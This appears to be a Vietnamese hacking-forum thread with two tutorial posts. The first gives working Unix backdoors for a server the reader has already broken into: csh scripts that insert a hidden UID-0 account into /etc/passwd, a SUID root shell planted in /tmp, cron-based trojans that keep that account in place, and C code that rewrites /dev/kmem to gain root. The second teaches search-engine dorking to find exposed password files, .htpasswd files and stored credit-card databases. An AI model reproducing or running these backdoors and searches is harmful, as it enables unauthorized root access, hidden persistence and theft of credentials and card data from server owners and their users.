Liên Minh SVN
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.

Liên Minh SVN

Liên Minh Các Lực Lượng Quốc Gia Việt Nam
 
CổngCổng  Trang ChínhTrang Chính  Tìm kiếmTìm kiếm  Latest imagesLatest images  Đăng Nhập  Đăng kýĐăng ký  Sách HiếmSách Hiếm  TiViTiVi  Diễn Đàn Liên KếtDiễn Đàn Liên Kết  
--------------------------------------- Lực Lượng Dân Tộc Cực Đoan Việt Nam -------------------------- Cộng sản hay không cộng sản ? Chúng tôi là những người yêu nước luôn muốn chống lại những thế lực phá họai một đất nước tự do ! Trả thù lại những gì bọn ngọai bang đã gây ra cho đất nước chúng ta ! Thù hận những kẻ thù đã gây ra tang thương cho dân tộc giống nòi việt nam ! Luôn mong muốn trả thù cho dân tộc !
Cộng sản hay không, một lực lượng đã thành công đánh đuổi được thực dân, mang lại độc lập và thống nhất cho đất nước mà là “Việt Gian”, vậy thì tổ chức tôn giáo của những người Việt hoàn toàn lệ thuộc ngoại bang, đi làm tay sai cho thực dân Pháp để đưa nước nhà vào vòng nô lệ thì gọi là gì ? Là những người “yêu nước” hay sao?
Có bao giờ chúng ta đặt một câu hỏi cho chính chúng ta, những người quốc gia, là nếu những điều chúng ta viết ở hải ngoại trong những chiến dịch “tố Cộng” là đúng, thì làm sao CS có thể thắng trong cả hai cuộc chiến?

 

 Backdoors trong một Unix :

Go down 
Tác giảThông điệp
AdminKhoa
Đại TướngĐại Tướng
AdminKhoa


-= Giáo Sĩ =-
Chức Vụ Chủ Tịch
Backdoors trong một Unix : Admin
Sao Vàng
Tiền Đồng : 81
Tổng số bài gửi : 42
Gia nhập : 04/08/2010
Phương châm : Tiền !

Backdoors trong một Unix : Empty
Bài gửiTiêu đề: Backdoors trong một Unix :   Backdoors trong một Unix : Empty9/8/2010, 09:52


--------------------------------------------------------------------------------
Backdoors trong một Unix :

OK .... Bạn đang Hack 1 server Unix , bạn đã có tất cả trong tay nhưng công cụ dùng để Hack server , Bạn đã thử tất cả những độc chiêu mà bạn có . Server bảo mật rất cao . Bạn đã thử mọi thứ : Default passwds (pass mặc định ) Guessable passwds ( đoán pass ) , NIS weaknesses ( Các chỗ yếu của Nix ) , NFS holes ( lỗ hổng trong NFS ) , incorrect permissions ( những sự cho phép sai ) , race conditions ( he he cái này mấy chắc tên cao thủ chắc cũng biết ) SUID exploits, Sendmail bugs ( lỗi lập trình của Sendmail ) và và .... không còn gì nữa mà thử . Làm sao đây ! hic hic ... Một Server sẽ có money khi ta Hack đợc vào .
Bây giờ bạn sẽ tấn cống vào website bảo mật rất kém , hay vô tình có 1 pass user nằm trong hệ thống server . Hay bằng cách nào đó bạn có đợc 1 password của 1 user trong server ấy . Vậy là bạn đã có 1 ít quyền lực rất nhỏ trong hệ thống . Bạn là 1 Hacker bạn muốn chiếm quyền ROOT , bạn muốn có quyền lực tối cao trong server . Từ một viễn cảnh lu mờ ban sẽ trở nên hanh phúc khi có quyền Admin . Trong bài viết này tôi sẽ hớng dẫn các bạn 1 trong những cách có thể làm đợc điều đó . :-)

Hiểu Biết :

Trớc hết tôi yêu cầu ở bài này là các bạn phải nắm rõ đợc hệ thống của các file trên 1 server Unix , có thể biết đợc rằng passwd nó nằm ở đâu . Nếu bạn không thể liệt kê đợc những hệ thống chính của 1 server Unix thì tôi khuyên bạn hãy tìm ngay 1 quyển Unix đọc xong thì hay quay lại với tôi . Bạn phải có những khái niệm ví dụ nh file Passwd có 7 trờng ( hay hệ thống đợc đặt tên theo những quy ớc , những cơ chế shadowing , ect ..) Bạn biết về VI không ? Có nhiều hệ thống không có Pico và Emác . Vi là 1 trình soạn thảo khá hữu ích khi ta muốn có search 1 file lớn . Tôi muốn nhắc tới những vấn đề đó làm gì . Chính là muốn nhắc tới những con Backdoor có khả năng làm những điều đó , nó sẽ nh 1 cánh tay đắc lực cua Hacker

Công Khai :

1 . Cách đơn giản nhất để ta có thêm quyền là thêm 1 tai khoản UID 0 vào file passwd . Cái này dễ dàng nhất và nhanh chóng nhất giup chúng ta nắm quyền thêm quền trong root . Nhưng khi làm nh vậy thì có làm đợc không , chẳng nhẽ nó lại dễ dàng cho 1 user nh vậy . Tất nhiên hệ thống sẽ thông báo cho admin 1 tin rằng , Đang có sự thay đổi password . Nếu bạn muốn làm điều này thì tôi xin nói trớc là không dơn giản đâu . Chắc chắn ai đã từng muốn khảo sát file passwd sẽ thấy điều này . Tôi có 1 cách hay cực , chả mất công teo nào . Bạn chỉ việc cài 1 con Backdoor rồi chạy nó . Nó có code sau :

#!/bin/csh
# Chèn 1 tài khoản UID=0 vào trong file passwd.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# phunganhtuan32@hotmail.com
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...

Save đoạn code tên thành 1 file *.pl hoặc *.cgi để chạy
he he .... Thấy thế nào về đoạn mã này ! Quá tuyệt vời phải không . Nhưng chú ý này . đừng bao giờ thay đổi mật khẩu của Root nha , không thì nguy đấy .

Tuy nhiên có một số hệ thống sẽ không để UID 0 hoạt động , Cái này do Admin quyết định , khi đó bạn thêm vào tài khoản UID 0 thì cũng coi nh vô nghĩa , vậy hãy tìm cách khác bằng cách thay đổi password của những tài khoản có quyền gần nh ngang hàng với Root ( VD : lbin )

2. Thêm 1 SUID root shell vào trong /tmp . he he ... Lại rất đơn giản bằng code sau :

#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that...
chmod 4755 /tmp/.evilnaughtyshell
Có một số hệ thống tránh việc tồn tại những file bất hợp pháp trong /temp se cho clean khi hệ thống đuợc reboot hay theo định kỳ . Chúng làm việc nh 1 cron job .
hãy thử check vào /var/spool/cron/crontabs/root and /etc/fstab
Tôi tặng cho các bạn 2 con trojan có khả năng chay trên hệ thông nh 1 cron mà không bị hạn chế điều gì .
Cron-based trojan I. :
#!/bin/csh
# Is our eviluser still on the system? Let's make sure he is.
#daemon9@netcom.com
set evilflag = (`grep eviluser /etc/passwd`)
if($#evilflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done... else endif

Cron-based trojan II :

#!/bin/csh # Install trojan /etc/passwd file for one minute #daemon9@netcom.com cp /etc/passwd
/etc/.temppass cp /var/spool/mail/.sneaky /etc/passwd sleep 60 mv /etc/.temppass /etc/passwd

Bí Mật :
/dev/kmem exploit nó là đại diện cho hệ thống trong việc thay đổi UID . để yêu cầu /dev/kmem cho read/write permission thì chúng ta phải gọi đợc /dev/kmem ( excute ) và tìm kiếm đợc nội dung thông tin muốn thay đổi . Trơng trình sau sẽ giup ban làm điều đó :

/* If /kmem is is readable and writable, this program will change the user's UID and GID to 0. */ /* This code originally appeared in "UNIX security: A practical tutorial" with some modifications by daemon9@netcom.com */ #include #include #include #include #include #include #include #define KEYWORD "nomenclature1" struct user userpage; long address(), userlocation; int main(argc, argv, envp) int argc; char *argv[], *envp[];{ int count, fd; long where, lseek(); if(argv[1]){ /* we've got an argument, is it the keyword? */ if(!(strcmp(KEYWORD,argv[1]))){ fd=(open("/dev/kmem",O_RDWR); if(fd<0){ printf("Cannot read or write to /dev/kmem\n"); perror(argv); exit(10); } userlocation=address(); where=(lseek(fd,userlocation,0); if(where!=userlocation){ printf("Cannot seek to user page\n"); perror(argv); exit(20); } count=read(fd,&userpage,sizeof(struct user)); if(count!=sizeof(struct user)){ printf("Cannot read user page\n"); perror(argv); exit(30); } printf("Current UID: %d\n",userpage.u_ruid); printf("Current GID: %d\n",userpage.g_ruid); userpage.u_ruid=0; userpage.u_rgid=0; where=lseek(fd,userlocation,0); if(where!=userlocation){ printf("Cannot seek to user page\n"); perror(argv); exit(40); } write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage)); execle("/bin/csh","/bin/csh","-i",(char *)0, envp); } } } /* End main */ #include #include #include #define LNULL ((LDFILE *)0) long address(){ LDFILE *object; SYMENT symbol; long idx=0; object=ldopen("/unix",LNULL); if(!object){ fprintf(stderr,"Cannot open /unix.\n"); exit(50); } for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){ if(!strcmp("_u",ldgetname(object,&symbol))){ fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value); ldclose(object); return(symbol.n_value); } } fprintf(stderr,"Cannot read symbol table in /unix.\n"); exit(60); }

Bạn hãy tin tờng vào đoạn code này , nó sẽ làm việc rất tốt đấy . đừng có bỏ không đấy nha . :-)

Bạn cũng có thể thay đổi nội dung trong /dev/kmem bằng đoạn code thay đổi UID trong passwd bằng cách nhúng thêm đoạn mã sau :

chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before

Lời Kết :
Backdoor luôn là công cụ rất hiệu quả trong việc Hack 1 hệ thống Unix , Tôi muốn nói ở đây là Backdoor thực hiện những Script nh view , del , up . Chứ không phải Backdoor mở Port đâu nha . Bạn hãy tìm hiểu những con Backdoor khác , có nhiều con rất hay , thậm trí nếu server bảo mật kém thì khi ta điều khiển Backdoor ta có thể ngang hàng với Root mà không phải leo thang cái quái gì cả :-) chúc các bạn thành công .


--------------------------------------------------------------------------------


Về Đầu Trang Go down
AdminKhoa
Đại TướngĐại Tướng
AdminKhoa


-= Giáo Sĩ =-
Chức Vụ Chủ Tịch
Backdoors trong một Unix : Admin
Sao Vàng
Tiền Đồng : 81
Tổng số bài gửi : 42
Gia nhập : 04/08/2010
Phương châm : Tiền !

Backdoors trong một Unix : Empty
Bài gửiTiêu đề: Re: Backdoors trong một Unix :   Backdoors trong một Unix : Empty9/8/2010, 09:54

Sử dụng công cụ tìm kiếm cho việc hack

pham thanh hai (Thanh vien chinh thuc cua Diendan00DT1)

Tôi biết bạn đang nghĩ gì?" Làm thế nào để tôi có thể dùng công cụ tìm kiếm để hack ?" điều này là ở thế,nhưng nó có thể giúp cho bạn những lợi ích thật sư nhanh và dễ dàng. Tôi xin được đưa vào nguyên văn :"it can't,but it can help you find vulnerable scripts really really fast and really really easy
Chúng cho phép bạn tìm thấy những điều mà bạn thực sự sẽ chưa bao giờ tìm thấy trước đó Và với đặc điểm tìm kiếm mới của google, bạn có thể thấy được những điềuđã được đưa xuống
Nếu bạn nghĩ rằng that o thoã đáng để đợi,tôi sẽ giải thích vài tình huống nơi tôi đã sử dụng công cụ tìm kiếm để có thể đột nhập và xem những gì mà admin muốn giữ bí mật
Bây giờ một phần lớn của điều mà nghe có vẻ như tôi là scripts kiddie (o hieu hihi) và với kỹ thuật này nó có vẻ là khá hữu dụng. Không có gì là sai với việc tìm con đường dễ bây giờ và về sau
Vì vậy chúng ta bắt đầu với ví dụ đầu tiên của việc sử dụng công cụ tìm kiếm để hack
Cơ sở dữ liệu là những file chứa dữ liệu trong đó,và chúng thường là thông tin, cơ sở dữ liệu hay là những gi giống thế (info.db,database.txt,list.txt)…. những cơ sở dữ liệu đó có thể chứa rất nhiều thứ khác nhau và khi để cả thế giới biết thì chúng có thể bị khai thác.
chúng ta hãy nói về công ty AAA, họ bán giấy trên web sites của họ. Công ty AAA đã sử dụng scripts từ http://www.freescripts.com/
vậy bước đầu tiên của chúng ta là gì ?
Chúng ta kiểm tra công ty AAA và thấy rằng họ đang sử dụng scripts từ http://www.freescripts.com/ và đầu tiên chúng ta kiểm tra Net để biết khai thác scripts. Nhưng bạn có biết chúng bằt đầu từ đâu không ? Tìm kiếm tên của một file trên google
"download submitform3.php3"
Nếu nó là một tên thông thường ta sẽ tìm được vài mẫu lệnh của scripts mà chứa ở trên tất cả các scripts,ví dụ : "scripts coded by redranger" và tìm kiếm nó
Ok bây giờ bạn đã có tên trang web chứa scripts, tìm trong trang chu của nó,tìm kiếm để biết khai thác và bạn cảm thấy thế thật là mất thời gian của bạn, cố gằng lần này, download scripts ở trên trang chủ của nó và nhìn toàn bộ để khai thác
Tôi đã thực sử kinh ngạc vì tỷ lệ của scripts có lỗ hổng bảo mật trong chúng (một cách hay nhiều cách khác nhau)
Bạn chưa từng tìm kiếm và khai thác thành công ?
Không sao cả, người bạn google sẽ giúp chúng ta.
Đến trang http://www.google.com/,đánh "allinurl:php site" và Enter : http://www.itvnonline.net/bai%20viet/www.google.com no se tim bat cu php scripts tren cong ti AAA.
Bạn cũng có thể tìm kiếm allinurl:cgi hoặc jsp hoặc bất cứ scripts nào bạn muốn tìm. Con đường tốt nhất cho mục tiêu ngẫu nhiên là khai thác được scripts mới nhất từ bugtraq và allinurl:script.cgi……… tôi không đề nghị như vậy, bởi vì như vậy thực sự là không hợp lý, một người nào đó có thể làm vậy và bạn không có lý do gì để khai thác nhiều trong số trang đó……nhưng có thể bạn sẽ phải đi ngang qua trang web củ kẻ địch
Tro lai co so du lieu,noi ve scripts trong cong ti AAA dua vao tu form cua truong khi ma nguoi su dung mua mot cai gi do.Nguoi su dung se dua vao ten,ngay sinh,dia chi,so dien thoai,the tin dung cua ho.scripts se luu tru nhung thong tin trong userdb.txt
Bay gio ban co the dung google voi allinurl:urluserdb.txt site:congtiAAA.com va nhin vao vi tri file nay dang luu tru,neu ban o thay co ket qua thi do la vi ho da thay doi ten cua db file hoac la ho dang chua chung trong thu muc o the doc duoc
Neu ban tim kiem co ket qua,co gang tim toan bo Net voi allinurl:userdb.txt
Hacker co the co duoc tap hop kha nhieu so the tin dung o trong tung thoi gian ngan voi ki thuat nay
Vao 1 ngay toi gui thong tin len trang web cua toi va toi nhan duoc 20000 email tu tim kiem file co so du lieu mac dinh de gui nhung scripts
Day la tin duoc gui tu ngay do
I decided to do a little searching google today….I found thousands of password.txt,passwd.txt,pass.txt and other files people don't want me seeing. Then while directory browsing a site I found maillist/address.txt which had like 20 email address in it …I think it is solution scripts powerlist scripts:
$address_file="address.txt" unless $address_file;
$pwd_file="password.txt" unless $pwd_file;
so I searched for address.txt and found tons of site with email lists.After downloading some popular mailing list scripts I checked them to see what their default mailing list database files were and I searched for those on google.I gathered over 20000 email address……I dunno if this is a lot in the spamming world, but I'd say It's something people should be alittle concerned about.

(ngay hom nay toi quyet dinh tim kiem 1 chut voi google….toi da tim thay hang ngan password.txt,passwd.txt,pass.txt va rat nhieu files ma moi nguoi o muon toi nhin thay.Sau do trong khi thu muc tim kiem site toi da tim thay mailinglist/address.txt va co khoang 20 email trong do,toi nghi day la kha nang scripts de giai quyet
$address_file="address.txt" unless $address_file;
$pwd_file="password.txt" unless $pwd_file;
sau do toi tim kiem address.txt va toi nhin thay nhieu trang web voi list mail
sau khi download 1 so scripts trong list nhung email pho bien,toi da kiem tra chung va thay co gia tri mac dinh cua file co so du lieu o do va toi da tim duoc rat nhieu cai nhu the tren google
toi da thu thap duoc hon 20000 dia chi email ……toi muon noi rang moi thu co lien quan voi nhau)
tim kiem allinurl:htpasswd se dan den rat nhieu cau hinh cua trang web ma no cho fep ban xem ".htpasswd file".Co rat nhieu admin va user ngu ngoc se su dung login giong nhau,password cho tai khoan cua ho nhu ho da lam voi ".htpasswd"
dieu nay co nghia la neu 1 lan ban co .htpasswd va crack no,ban co the truy cap vao tai khoan cua ho.
Toi quyet dinh day co the la 1 phuong phap tot cho nguoi duoc phep tim kiem thu muc,ban co the doc duoc khoa hoc hay tai http://www.lameindustries.org/tutorials/victimcom/index.shtml
Toi da tim kiem "index of" tai google va cuoi cung thay rang
"of" la 1 tu rat thong dung va se o duoc dua vao tim kiem cua ban.
Vi the nen toi biet rang tim kiem "index" se o giup ta tim duoc nhung gi ta muon .vi the nen toi da nghi den cai thu 2 va co gang tim kiem thu muc ro rang ma toi muon xem
"index of/password" la tim kiem dau tien cua toi…….16000 ket qua
toi nghi dieu nay co the lam trong 1 lat è nao bay gio chung ta tim den mon thu vi hon
"index of/password" "index of/passwd" "index of/warez" "index of/boobs"
eeeee va day la buoc cuoi cung
o 1 buoc tiep theo toi nhan duoc thong tin o http://budkwan.virtualave.net/
anh ta noi voi toi lam the nao de mua xe su dung truong dua vao la an de dinh gia,vi the tim kiem type=hidden name=price boc lo ra it hon 100 trang voi loi nay
toi chac chan rang ban co the su dung cac phuong phap tim kiem khac
ho cho fep ban tim nhung holes trong form html ,password mac dinh
co so du lieu mac dinh and tim nhung loi bao mat rat nhanh va don gian.


pham thanh hai email: 911@heartmail.com(Thanh vien chinh thuc cua Diendan00DT1)



Về Đầu Trang Go down
AdminKhoa
Đại TướngĐại Tướng
AdminKhoa


-= Giáo Sĩ =-
Chức Vụ Chủ Tịch
Backdoors trong một Unix : Admin
Sao Vàng
Tiền Đồng : 81
Tổng số bài gửi : 42
Gia nhập : 04/08/2010
Phương châm : Tiền !

Backdoors trong một Unix : Empty
Bài gửiTiêu đề: Re: Backdoors trong một Unix :   Backdoors trong một Unix : Empty9/8/2010, 09:54

http://antihacker.50webs.com/ky%20thuat%20hack/kythuat.html
Về Đầu Trang Go down
Sponsored content





Backdoors trong một Unix : Empty
Bài gửiTiêu đề: Re: Backdoors trong một Unix :   Backdoors trong một Unix : Empty

Về Đầu Trang Go down
 
Backdoors trong một Unix :
Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» Múa Sexy trong thiên tử !
» Hình ảnh mới nhất trong game của tui !
» Những Thế Lực Đen Tối Trong Giáo Hội Việt Nam
» SỰ THẬT VỀ QUAN HỆ VIỆT NAM & TRUNG QUỐC TRONG 30 NĂM QUA
» Tổ chức Theo dõi nhân quyền trong vai một "quân sư tồi"

Permissions in this forum:Bạn không có quyền trả lời bài viết
Liên Minh SVN :: Tin học ! :: Tin học !-
Chuyển đến 
Tìm kiếm
 
 

Display results as :
 
Rechercher Advanced Search